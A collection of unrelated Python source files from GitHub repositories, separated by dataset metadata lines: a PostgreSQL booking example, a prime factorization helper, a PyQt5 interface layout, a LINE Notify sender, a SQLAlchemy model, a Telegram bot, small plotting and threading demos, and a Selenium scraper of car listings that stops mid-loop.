                                      database="sample")

        # drop_tables(connection)
        create_table(connection)
        insert_names(connection)
        insert_courses(connection)
        insert_booking(connection, "Marco", "Torlaschi", "SQL")
        insert_booking(connection, "Marco", "Torlaschi", "SPRING")
        insert_booking(connection, "Roberta", "Latini", "SPRING")

        cursor = connection.cursor()
        cursor.execute("SELECT * FROM students,booking,courses "
                       "WHERE students.ID=booking.STUDENT_ID AND courses.ID=booking.COURSE_ID")
        riga = cursor.fetchall()
        print(riga)

        drop_tables(connection)
    except (Exception, psycopg2.Error) as error:
        # Catch connection (or any other unexpected) errors.
        print("Error while connecting to PostgreSQL", error)
    finally:
        # Close the connection in `finally` so it always happens.
        if connection:
            connection.close()
            print("PostgreSQL connection is closed")
Torla/postgres_ex
main.py
main.py
py
5,031
python
en
code
0
github-code
36
1947598630
import util

# Growing cache of primes, shared across calls; init() extends it in place.
primes = [2, 3]
# Not used in this module; kept because other project modules may import it.
d_sum = [0]


def init(n):
    """Extend the ``primes`` cache with every prime below ``n``.

    Uses trial division by the cached primes; only odd candidates are
    tested since every even number above 2 is composite.
    """
    i = primes[-1]
    while i < n:
        i += 2
        for num in primes:
            if num * num > i:
                # No prime divisor up to sqrt(i) found, so i is prime.
                primes.append(i)
                break
            if i % num == 0:
                break


def decompose(n):
    """Return the prime factorization of ``n`` as ``{prime: exponent}``.

    Returns an empty dict for n <= 1.
    """
    init(n)
    fac = {}
    i = 0
    while n > 1:
        p = primes[i]
        if n % p == 0:
            # Bug fix: the original used int(n / p), which goes through
            # float division and is wrong for n above 2**53; floor
            # division keeps everything in exact integer arithmetic.
            n //= p
            fac[p] = fac.get(p, 0) + 1
        elif p * p > n:
            # Remaining n has no divisor <= sqrt(n), hence it is prime.
            fac[n] = 1
            break
        else:
            i += 1
    return fac
liligeng111/Euler_Python
prime.py
prime.py
py
629
python
en
code
1
github-code
36
35701573370
from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(899, 563) MainWindow.setMinimumSize(QtCore.QSize(700, 480)) MainWindow.setStyleSheet("*{\n" "background:#18162A;\n" "border:none;\n" "color:white;\n" "}") self.centralwidget = QtWidgets.QWidget(MainWindow) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.centralwidget.sizePolicy().hasHeightForWidth()) self.centralwidget.setSizePolicy(sizePolicy) self.centralwidget.setObjectName("centralwidget") self.hboxlayout = QtWidgets.QHBoxLayout(self.centralwidget) self.hboxlayout.setContentsMargins(0, 0, 0, 0) self.hboxlayout.setSpacing(0) self.hboxlayout.setObjectName("hboxlayout") self.leftMenu = QtWidgets.QFrame(self.centralwidget) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.leftMenu.sizePolicy().hasHeightForWidth()) self.leftMenu.setSizePolicy(sizePolicy) self.leftMenu.setMinimumSize(QtCore.QSize(200, 0)) self.leftMenu.setMaximumSize(QtCore.QSize(0, 16777215)) self.leftMenu.setStyleSheet("background:#060117; border:none;") self.leftMenu.setFrameShape(QtWidgets.QFrame.StyledPanel) self.leftMenu.setFrameShadow(QtWidgets.QFrame.Raised) self.leftMenu.setLineWidth(0) self.leftMenu.setObjectName("leftMenu") self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.leftMenu) self.verticalLayout_2.setContentsMargins(0, 0, 0, 0) self.verticalLayout_2.setSpacing(0) self.verticalLayout_2.setObjectName("verticalLayout_2") self.frame_4 = QtWidgets.QFrame(self.leftMenu) self.frame_4.setMinimumSize(QtCore.QSize(0, 50)) self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised) 
self.frame_4.setObjectName("frame_4") self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.frame_4) self.verticalLayout_3.setObjectName("verticalLayout_3") self.dvsoft = QtWidgets.QPushButton(self.frame_4) self.dvsoft.setText("DVsoft") self.dvsoft.setObjectName("pushButton_9") self.dvsoft.setStyleSheet("font-size:32px;") self.verticalLayout_3.addWidget(self.dvsoft, 0, QtCore.Qt.AlignLeft) self.verticalLayout_2.addWidget(self.frame_4, 0, QtCore.Qt.AlignTop) self.frame_5 = QtWidgets.QFrame(self.leftMenu) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.frame_5.sizePolicy().hasHeightForWidth()) self.frame_5.setSizePolicy(sizePolicy) self.frame_5.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_5.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_5.setObjectName("frame_5") self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.frame_5) self.verticalLayout_4.setContentsMargins(0, 0, 0, 0) self.verticalLayout_4.setSpacing(0) self.verticalLayout_4.setObjectName("verticalLayout_4") self.Menu2 = QtWidgets.QToolBox(self.frame_5) self.Menu2.setStyleSheet("QToolBox{\n" " background-color:rgb(24,24,36);\n" " text-align:left;\n" " font-size:20px;\n" " color:white;\n" "}\n" "QToolBox::tab{\n" " border-radius:5px;\n" " background-color:rgb(17,16,26);\n" " text-align:left;\n" " font-size:20px;\n" " color:white;\n" "}") self.Menu2.setObjectName("Menu2") self.Menu1 = QtWidgets.QWidget() self.Menu1.setGeometry(QtCore.QRect(0, 0, 200, 357)) self.Menu1.setStyleSheet("") self.Menu1.setObjectName("Menu1") self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.Menu1) self.verticalLayout_5.setObjectName("verticalLayout_5") self.frame_7 = QtWidgets.QFrame(self.Menu1) self.frame_7.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_7.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_7.setObjectName("frame_7") self.verticalLayout_6 = 
QtWidgets.QVBoxLayout(self.frame_7) self.verticalLayout_6.setContentsMargins(0, 0, 0, 0) self.verticalLayout_6.setSpacing(10) self.verticalLayout_6.setObjectName("verticalLayout_6") self.pushButton = QtWidgets.QPushButton(self.frame_7) self.pushButton.setStyleSheet("font-size:20px") self.pushButton.setObjectName("pushButton") self.verticalLayout_6.addWidget(self.pushButton) self.pushButton_2 = QtWidgets.QPushButton(self.frame_7) self.pushButton_2.setStyleSheet("font-size:20px") self.pushButton_2.setObjectName("pushButton_2") self.verticalLayout_6.addWidget(self.pushButton_2) self.pushButton_3 = QtWidgets.QPushButton(self.frame_7) self.pushButton_3.setStyleSheet("font-size:20px") self.pushButton_3.setObjectName("pushButton_3") self.verticalLayout_6.addWidget(self.pushButton_3) self.verticalLayout_5.addWidget(self.frame_7, 0, QtCore.Qt.AlignTop) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap("icons/strelka3.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.Menu2.addItem(self.Menu1, icon, "") self.menu2 = QtWidgets.QWidget() self.menu2.setGeometry(QtCore.QRect(0, 0, 200, 357)) self.menu2.setObjectName("menu2") self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.menu2) self.verticalLayout_7.setObjectName("verticalLayout_7") self.frame_8 = QtWidgets.QFrame(self.menu2) self.frame_8.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_8.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_8.setObjectName("frame_8") self.verticalLayout_8 = QtWidgets.QVBoxLayout(self.frame_8) self.verticalLayout_8.setContentsMargins(0, 0, 0, 0) self.verticalLayout_8.setSpacing(15) self.verticalLayout_8.setObjectName("verticalLayout_8") self.pushButton_4 = QtWidgets.QPushButton(self.frame_8) self.pushButton_4.setStyleSheet("font-size:20px;") self.pushButton_4.setObjectName("pushButton_4") self.verticalLayout_8.addWidget(self.pushButton_4) self.pushButton_5 = QtWidgets.QPushButton(self.frame_8) self.pushButton_5.setStyleSheet("font-size:20px") self.pushButton_5.setObjectName("pushButton_5") 
self.verticalLayout_8.addWidget(self.pushButton_5) self.label_2 = QtWidgets.QLabel(self.frame_8) self.label_2.setStyleSheet("font-size:20px;") self.label_2.setWordWrap(True) self.label_2.setObjectName("label_2") self.verticalLayout_8.addWidget(self.label_2) self.verticalLayout_7.addWidget(self.frame_8) self.Menu2.addItem(self.menu2, icon, "") self.verticalLayout_4.addWidget(self.Menu2) self.verticalLayout_2.addWidget(self.frame_5) self.frame_6 = QtWidgets.QFrame(self.leftMenu) self.frame_6.setMinimumSize(QtCore.QSize(0, 50)) self.frame_6.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_6.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_6.setObjectName("frame_6") self.horizontalLayout_8 = QtWidgets.QHBoxLayout(self.frame_6) self.horizontalLayout_8.setObjectName("horizontalLayout_8") self.exit = QtWidgets.QPushButton(self.frame_6) self.exit.setStyleSheet("font-size:20px;") icon1 = QtGui.QIcon() icon1.addPixmap(QtGui.QPixmap("icons/выход.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.exit.setIcon(icon1) self.exit.setObjectName("pushButton_12") self.horizontalLayout_8.addWidget(self.exit, 0, QtCore.Qt.AlignLeft) self.verticalLayout_2.addWidget(self.frame_6) self.hboxlayout.addWidget(self.leftMenu) self.MainFrame = QtWidgets.QFrame(self.centralwidget) self.MainFrame.setStyleSheet("border:none;") self.MainFrame.setFrameShape(QtWidgets.QFrame.StyledPanel) self.MainFrame.setFrameShadow(QtWidgets.QFrame.Raised) self.MainFrame.setObjectName("MainFrame") self.verticalLayout = QtWidgets.QVBoxLayout(self.MainFrame) self.verticalLayout.setContentsMargins(0, 0, 0, 0) self.verticalLayout.setSpacing(0) self.verticalLayout.setObjectName("verticalLayout") self.header = QtWidgets.QFrame(self.MainFrame) self.header.setMinimumSize(QtCore.QSize(0, 50)) self.header.setStyleSheet("background:#060117; border:none;") self.header.setFrameShape(QtWidgets.QFrame.StyledPanel) self.header.setFrameShadow(QtWidgets.QFrame.Raised) self.header.setLineWidth(0) 
self.header.setObjectName("header") self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.header) self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.frame = QtWidgets.QFrame(self.header) self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame.setFrameShadow(QtWidgets.QFrame.Raised) self.frame.setObjectName("frame") self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame) self.horizontalLayout.setContentsMargins(0, 0, 0, 0) self.horizontalLayout.setSpacing(0) self.horizontalLayout.setObjectName("horizontalLayout") self.menuTurn = QtWidgets.QPushButton(self.frame) self.menuTurn.setText("") icon2 = QtGui.QIcon() icon2.addPixmap(QtGui.QPixmap("icons/свернуть бар.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.menuTurn.setIcon(icon2) self.menuTurn.setIconSize(QtCore.QSize(32, 32)) self.menuTurn.setObjectName("pushButton_11") self.horizontalLayout.addWidget(self.menuTurn) self.lineEdit = QtWidgets.QLineEdit(self.frame) self.lineEdit.setStyleSheet("border-bottom:2px solid #19E67E;\n" "font-size:24px;") self.lineEdit.setObjectName("lineEdit") self.horizontalLayout.addWidget(self.lineEdit) self.pushButton_10 = QtWidgets.QPushButton(self.frame) self.pushButton_10.setText("") icon3 = QtGui.QIcon() icon3.addPixmap(QtGui.QPixmap("icons/search.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.pushButton_10.setIcon(icon3) self.pushButton_10.setIconSize(QtCore.QSize(32, 32)) self.pushButton_10.setObjectName("pushButton_10") self.horizontalLayout.addWidget(self.pushButton_10) self.horizontalLayout_2.addWidget(self.frame, 0, QtCore.Qt.AlignLeft) self.frame_2 = QtWidgets.QFrame(self.header) self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_2.setObjectName("frame_2") self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.frame_2) self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_4.setSpacing(0) self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.username 
= QtWidgets.QPushButton(self.frame_2) self.username.setText("USERNAME") icon4 = QtGui.QIcon() icon4.addPixmap(QtGui.QPixmap("icons/пользователь.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.username.setIcon(icon4) self.username.setIconSize(QtCore.QSize(32, 32)) self.username.setObjectName("pushButton_9") self.username.setStyleSheet("font-size:24px;") self.horizontalLayout_4.addWidget(self.username, 0, QtCore.Qt.AlignLeft) self.horizontalLayout_2.addWidget(self.frame_2, 0, QtCore.Qt.AlignHCenter) self.frame_3 = QtWidgets.QFrame(self.header) self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_3.setObjectName("frame_3") self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.frame_3) self.horizontalLayout_3.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_3.setSpacing(0) self.horizontalLayout_3.setObjectName("horizontalLayout_3") self.turn = QtWidgets.QPushButton(self.frame_3) self.turn.setText("") icon5 = QtGui.QIcon() icon5.addPixmap(QtGui.QPixmap("icons/свернуть.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.turn.setIcon(icon5) self.turn.setIconSize(QtCore.QSize(45, 45)) self.turn.setObjectName("pushButton_6") self.horizontalLayout_3.addWidget(self.turn) self.expand = QtWidgets.QPushButton(self.frame_3) self.expand.setText("") icon6 = QtGui.QIcon() icon6.addPixmap(QtGui.QPixmap("icons/двойная диагональная стрелка.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.expand.setIcon(icon6) self.expand.setIconSize(QtCore.QSize(30, 40)) self.expand.setObjectName("pushButton_7") self.horizontalLayout_3.addWidget(self.expand) self.close = QtWidgets.QPushButton(self.frame_3) self.close.setText("") icon7 = QtGui.QIcon() icon7.addPixmap(QtGui.QPixmap("icons/x.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.close.setIcon(icon7) self.close.setIconSize(QtCore.QSize(40, 40)) self.close.setObjectName("pushButton_8") self.horizontalLayout_3.addWidget(self.close) self.horizontalLayout_2.addWidget(self.frame_3, 
0, QtCore.Qt.AlignRight) self.verticalLayout.addWidget(self.header) self.main = QtWidgets.QFrame(self.MainFrame) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.main.sizePolicy().hasHeightForWidth()) self.main.setSizePolicy(sizePolicy) font = QtGui.QFont() font.setStyleStrategy(QtGui.QFont.PreferDefault) self.main.setFont(font) self.main.setAutoFillBackground(False) self.main.setFrameShape(QtWidgets.QFrame.StyledPanel) self.main.setFrameShadow(QtWidgets.QFrame.Raised) self.main.setObjectName("main") self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.main) self.verticalLayout_9.setObjectName("verticalLayout_9") self.label_5 = QtWidgets.QLabel(self.main) self.label_5.setStyleSheet("border:10px solid #19E67E;\n" "border-radius:90px;\n" "padding: 15px") self.label_5.setText("") self.label_5.setPixmap(QtGui.QPixmap("icons/логотип.svg")) self.label_5.setObjectName("label_5") self.verticalLayout_9.addWidget(self.label_5, 0, QtCore.Qt.AlignHCenter|QtCore.Qt.AlignBottom) self.label_6 = QtWidgets.QLabel(self.main) self.label_6.setStyleSheet("font-size:50px;") self.label_6.setObjectName("label_6") self.verticalLayout_9.addWidget(self.label_6, 0, QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop) self.verticalLayout.addWidget(self.main) self.footer = QtWidgets.QFrame(self.MainFrame) self.footer.setMinimumSize(QtCore.QSize(50, 50)) self.footer.setFrameShape(QtWidgets.QFrame.StyledPanel) self.footer.setFrameShadow(QtWidgets.QFrame.Raised) self.footer.setObjectName("footer") self.horizontalLayout_5 = QtWidgets.QHBoxLayout(self.footer) self.horizontalLayout_5.setContentsMargins(0, 0, 0, 0) self.horizontalLayout_5.setSpacing(0) self.horizontalLayout_5.setObjectName("horizontalLayout_5") self.frame_10 = QtWidgets.QFrame(self.footer) self.frame_10.setFrameShape(QtWidgets.QFrame.StyledPanel) 
self.frame_10.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_10.setObjectName("frame_10") self.horizontalLayout_6 = QtWidgets.QHBoxLayout(self.frame_10) self.horizontalLayout_6.setObjectName("horizontalLayout_6") self.label_4 = QtWidgets.QLabel(self.frame_10) self.label_4.setStyleSheet("font-size:14px;\n" "") self.label_4.setObjectName("label_4") self.horizontalLayout_6.addWidget(self.label_4, 0, QtCore.Qt.AlignLeft|QtCore.Qt.AlignBottom) self.horizontalLayout_5.addWidget(self.frame_10, 0, QtCore.Qt.AlignLeft) self.frame_9 = QtWidgets.QFrame(self.footer) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.frame_9.sizePolicy().hasHeightForWidth()) self.frame_9.setSizePolicy(sizePolicy) self.frame_9.setFrameShape(QtWidgets.QFrame.StyledPanel) self.frame_9.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_9.setObjectName("frame_9") self.horizontalLayout_7 = QtWidgets.QHBoxLayout(self.frame_9) self.horizontalLayout_7.setObjectName("horizontalLayout_7") self.horizontalLayout_5.addWidget(self.frame_9) self.verticalLayout.addWidget(self.footer) self.hboxlayout.addWidget(self.MainFrame) MainWindow.setCentralWidget(self.centralwidget) self.retranslateUi(MainWindow) self.Menu2.setCurrentIndex(1) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) self.dvsoft.setText(_translate("MainWindow", "DVsoft")) self.pushButton.setText(_translate("MainWindow", "Item1")) self.pushButton_2.setText(_translate("MainWindow", "Item2")) self.pushButton_3.setText(_translate("MainWindow", "Item3")) self.Menu2.setItemText(self.Menu2.indexOf(self.Menu1), _translate("MainWindow", "Menu1")) self.pushButton_4.setText(_translate("MainWindow", "Weather")) 
self.pushButton_5.setText(_translate("MainWindow", "Course Dollar/Euro")) self.label_2.setText(_translate("MainWindow", "Больше информации вы можете прочеcть на нашем сайте, который ещё не готов :)")) self.Menu2.setItemText(self.Menu2.indexOf(self.menu2), _translate("MainWindow", "Menu2")) self.exit.setText(_translate("MainWindow", "Exit")) self.lineEdit.setText(_translate("MainWindow", "Search")) self.label_6.setText(_translate("MainWindow", "DVsoft")) self.label_4.setText(_translate("MainWindow", "DVsoft.project.1")) import icons_rc
MyLongCode/project1
ui_interface.py
ui_interface.py
py
19,084
python
en
code
0
github-code
36
15381149189
import requests

from weather_message import WeatherStation

# LINE Notify REST endpoint.
LINE_URL = 'https://notify-api.line.me/api/notify'


def send_message(token, msg):
    """POST *msg* to LINE Notify using *token* and return the HTTP status code."""
    headers = {'Authorization': 'Bearer ' + token}
    payload = {'message': msg}
    # Bug fix: the LINE Notify API expects `message` as form data in the
    # POST body, not as URL query parameters; also add a timeout so the
    # script cannot hang forever on a stalled connection.
    response = requests.post(LINE_URL, headers=headers, data=payload, timeout=10)
    return response.status_code


def main():
    line_token = 'your_line_token'  # your LINE access token
    # TODO: fill in a message — LINE Notify rejects empty messages (HTTP 400).
    msg = ''
    status_code = send_message(line_token, msg)
    print(status_code)


if __name__ == '__main__':
    main()
shamiOuO/weather_report
Line_notify.py
Line_notify.py
py
544
python
en
code
0
github-code
36
21123419493
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, Text, TIMESTAMP
from sqlalchemy import func

Base = declarative_base()


class TestData(Base):
    """ORM model for the ``test`` table."""

    __tablename__ = 'test'

    id = Column(Integer, primary_key=True)
    data = Column(Text)
    # Set by the server on INSERT. NOTE(review): sysdate() is
    # Oracle-specific — confirm this matches the target database.
    created_at = Column(TIMESTAMP, server_default=func.sysdate())
    # Bug fix: the original only had server_default here, so the column
    # was set once on INSERT and never refreshed; onupdate makes every
    # UPDATE issued through SQLAlchemy refresh the timestamp.
    updated_at = Column(TIMESTAMP, server_default=func.sysdate(),
                        onupdate=func.sysdate())
tosiaki/windyfall_bot
testdata.py
testdata.py
py
423
python
en
code
0
github-code
36
34341824103
# -*- coding: utf-8 -*-
from telegram.ext import Updater
from telegram.ext import CommandHandler
from telegram.ext import MessageHandler, Filters
from telegram.ext.dispatcher import run_async
from telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove, KeyboardButton
import telegram

from emoji import emojize, demojize

from commands import *
from commands.libs.decorators import commands, descriptions
from commands.libs.history import add_history
from commands.general import cmd_start
from settings import *
from tools.text import analyze_text
from tools.libs import *
from shared import save_data, clean_data

import random, logging, os, sys, atexit, threading

# Set up basic logging.
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
                    level=logging.INFO)


@atexit.register
def final_handler():
    # Signal interpreter shutdown.
    print("Stop")


@run_async
def start(bot, update, args):
    """Handle /start: register the new client and greet them."""
    attrs = make_attrs_from_telegram(update, bot, args, {})
    cmd_start(attrs)


@run_async
def commands_handler(bot, update, args, no_fail_reply=False, attrs=None):
    """Dispatch an incoming message to the matching bot command.

    When *no_fail_reply* is True, unknown commands are ignored silently
    (used when free text is speculatively retried as a command).
    """
    try:
        if not attrs:
            attrs = make_attrs_from_telegram(update, bot, args, {})
        else:
            bot = attrs["telegram"]["bot"]
            update = attrs["telegram"]["update"]
            args = attrs["telegram"]["args"]

        commande = get_probable_command(update.message.text, bot.name)

        # In "channel" mode the history is recorded for the channel,
        # otherwise for the user's nickname.
        if commande:
            add_history(pseudo=username_or_channel(attrs),
                        command="{0} {1}".format(commande, attrs["query"]))
        else:
            add_history(pseudo=username_or_channel(attrs),
                        command=update.message.text)

        if commande in commands:
            if not no_fail_reply:
                # Only show the "typing..." indicator when we are allowed
                # to reply on failure.
                bot.sendChatAction(chat_id=update.message.chat_id, action="typing")

            # Run the requested command.
            retour = commands[commande](attrs)

            # Send the reply, if the command produced one.
            if retour != "" and retour is not None:
                if type(retour) is not str:
                    retour = " ".join(retour)
                retour = emojize(retour)
                bot.sendMessage(chat_id=update.message.chat_id, text=retour,
                                reply_markup=ReplyKeyboardRemove(),
                                parse_mode="Markdown")
        elif not no_fail_reply:
            # Unknown command and failure replies are allowed.
            update.message.reply_text(
                "Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide",
                reply_markup=ReplyKeyboardRemove())
    except Exception:
        # Never let a handler crash the dispatcher; log the full traceback
        # (the original printed the exception and traceback to stdout).
        logging.exception("commands_handler failed")


@run_async
def text_handler(bot, update):
    # Strip the bot's own name, analyze the free text, then try to run
    # the result as a command (silently if it matches nothing).
    update.message.text = update.message.text.replace(bot.name, "").lstrip()
    attrs = analyze_text(bot, update, do_google_search=is_private_channel(update))
    commands_handler(None, None, None, True, attrs=attrs)


@run_async
def location_handler(bot, update):
    # A shared location is handled as an implicit /proche command.
    args = update.message.text.split(' ')
    update.message.text = "/proche"
    commands_handler(bot, update, args[1:], no_fail_reply=True)


@run_async
def voice_handler(bot, update):
    # Voice messages are not understood yet.
    update.message.reply_text(
        emojize("Très jolie voix ! Mais je ne comprend pas encore la parole :cry:.", use_aliases=True),
        reply_markup=ReplyKeyboardRemove())


def unknown_handler(bot, update):
    update.message.reply_text(
        "Désolé, je ne comprend pas encore votre demande… La liste des commandes est disponible via /aide",
        reply_markup=ReplyKeyboardRemove())


def register_slash_commands():
    # One CommandHandler per registered bot command.
    for command in commands:
        dispatcher.add_handler(CommandHandler(command, commands_handler, pass_args=True))


def error(bot, update, error):
    # Bug fix: logging.warn is a deprecated alias of logging.warning.
    logging.warning('Update "%s" caused error "%s"' % (update, error))


if __name__ == '__main__':
    token = os.getenv('LAURENCE_TOKEN')
    if not token:
        logging.critical('Token absent')
        sys.exit()

    updater = Updater(token=token)
    dispatcher = updater.dispatcher

    dispatcher.add_handler(CommandHandler('start', start, pass_args=True))
    register_slash_commands()

    # Treat plain text as commands (temporary).
    dispatcher.add_handler(MessageHandler(Filters.text, text_handler))

    # Handle "location" messages.
    dispatcher.add_handler(MessageHandler(Filters.location, location_handler))

    # Handle "voice" messages.
    dispatcher.add_handler(MessageHandler(Filters.voice, voice_handler))

    # Log all errors.
    dispatcher.add_error_handler(error)

    print("Laurence is ready.")
    updater.start_polling()
c4software/laurence-bot
telegram_start.py
telegram_start.py
py
5,247
python
en
code
1
github-code
36
25175834547
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr  2 17:19:48 2023

Plot one full period of cosine/sine against the sample index, and the
resulting unit circle.

@author: acomeau
"""

import matplotlib.pyplot as plt
import time
import numpy as np

num_samples = 100

# Sample indices and one full period of cos/sin, vectorized with numpy.
# Bug fix: the original loop started at index 1, leaving sample 0 stuck
# at 0 (instead of cos(0) == 1), and built (1, 100)-shaped arrays that
# pyplot treats as 100 separate one-point lines.
x = np.arange(num_samples)
phase = x * 2.0 * np.pi / num_samples
x1 = np.cos(phase)
x2 = np.sin(phase)

plt.figure()

plt.subplot(211)
plt.plot(x, x1, 'k-.')
plt.plot(x, x2, 'k-.')
plt.xlabel('Sample')
plt.ylabel('x,y')

plt.subplot(212)
plt.plot(x1, x2, 'k-.')
# Bug fix: plt.axes('square') is not a valid call; axis('square') is the
# intended way to force equal scaling so the circle looks round.
plt.axis('square')
plt.xlabel('x1')
plt.ylabel('y1')

plt.show()
time.sleep(0.1)
adriencomeau/Telescopium
untitled1.py
untitled1.py
py
749
python
en
code
0
github-code
36
9742849940
import random
import math
import time
from threading import Barrier, Thread

# A barrier for 5 threads: nobody enters the mall until all 5 have arrived.
barrier = Barrier(5)

# Reference instant for the timestamps printed below.
start_time = math.floor(time.perf_counter())


def person_in_mall(name, arrival, visit):
    """Simulate one person: arrive, wait for everyone, visit, leave.

    arrival -- seconds before this person reaches the mall
    visit   -- seconds spent inside the mall
    """
    # Sleep for 'arrival' seconds, representing the trip to the mall.
    time.sleep(arrival)
    current_time = math.floor(time.perf_counter()) - start_time
    print(f'Time {current_time}s : {name} reached the mall\n', end='')

    # Block until all 5 threads reach this point, so everyone enters
    # the mall at the same time.
    barrier.wait()
    current_time = math.floor(time.perf_counter()) - start_time
    print(f'Time {current_time}s : {name} enters the mall\n', end='')

    # Sleep for 'visit' seconds, representing time spent inside.
    time.sleep(visit)
    current_time = math.floor(time.perf_counter()) - start_time
    print(f'Time {current_time}s : {name} leaves the mall\n', end='')


# Create 5 threads, one per person, with random arrival and visit times.
threads = []
for i in range(5):
    arrival = random.uniform(1, 20)  # time until this person reaches the mall
    visit = random.uniform(1, 10)    # how long they stay inside
    name = f'Person {i + 1}'
    threads.append(Thread(target=person_in_mall, args=[name, arrival, visit]))

for t in threads:
    t.start()

# Improvement: explicitly wait for every thread to finish instead of
# relying on the interpreter waiting for non-daemon threads.
for t in threads:
    t.join()
nilanjana123/Programming_lab
lab4/Q4.py
Q4.py
py
2,038
python
en
code
1
github-code
36
70506020904
#importing libraries
import pandas as pd
from selenium import webdriver # for webdriver
from selenium.common.exceptions import NoSuchElementException # for exception handling
import time # for delay

# setting platform for selenium
# NOTE(review): selenium 4 removed find_element_by_xpath/find_elements_by_xpath;
# this script targets selenium 3. Porting would need driver.find_element(By.XPATH, ...).
path = r'C:\Users\haqab\Desktop\DS\chromedriver.exe'
driver = webdriver.Chrome(path)

# url
driver.get('https://www.olx.in/cars_c84')

# setting arrays for data.
links = []
URL = []
Company_name = []
prices = []
Location = []
Model = []
Variant = []
Year = []
Fuel = []
Transmission = []
Mileage = []
No_owner = []

# FIX: ``pages`` was used below but never defined, so the script crashed with
# a NameError before scraping anything. Seed it with the main listing page;
# add further state-wise listing URLs here as needed.
pages = ['https://www.olx.in/cars_c84']

# main state wise url links
for i in pages:
    driver.get(i)
    # Click "load more" up to 14 times to expand the listing.
    for j in range(1, 15):
        try:
            time.sleep(1)
            # for clicking load more botton
            load_more = driver.find_element_by_xpath('//*[@class="rui-3sH3b rui-3K5JC rui-1zK8h"]')
            load_more.click()
        # escaping errors
        except NoSuchElementException:
            pass
    # car links: main links of cars to scrape.
    posts = driver.find_elements_by_xpath('//*[@class = "EIR5N"]/a')
    # FIX: was ``links = [...]`` which overwrote the links collected from
    # earlier pages on every iteration; extend accumulates across pages.
    links.extend(elem.get_attribute('href') for elem in posts)

# individual cars url main scraping process..
for i in links:
    driver.get(i)
    try:
        url = driver.find_element_by_xpath('//*[@rel = "alternate"]')
        URL.append(url.get_attribute('href'))

        name = driver.find_element_by_xpath('//*[@data-aut-id = "value_make"]').text
        Company_name.append(name)

        price = driver.find_element_by_xpath('//*[@class="_18gRm"]').text
        prices.append(price)

        local = driver.find_element_by_xpath('//*[@class="_2FRXm"]').text
        # third comma-separated field is the region — TODO confirm layout
        Location.append(local.split(',')[2])

        model = driver.find_element_by_xpath('//*[@data-aut-id = "value_model"]').text
        Model.append(model)

        variant = driver.find_element_by_xpath('//*[@data-aut-id = "value_variant"]').text
        Variant.append(variant)

        year = driver.find_element_by_xpath('//*[@data-aut-id = "value_year"]').text
        Year.append(year)

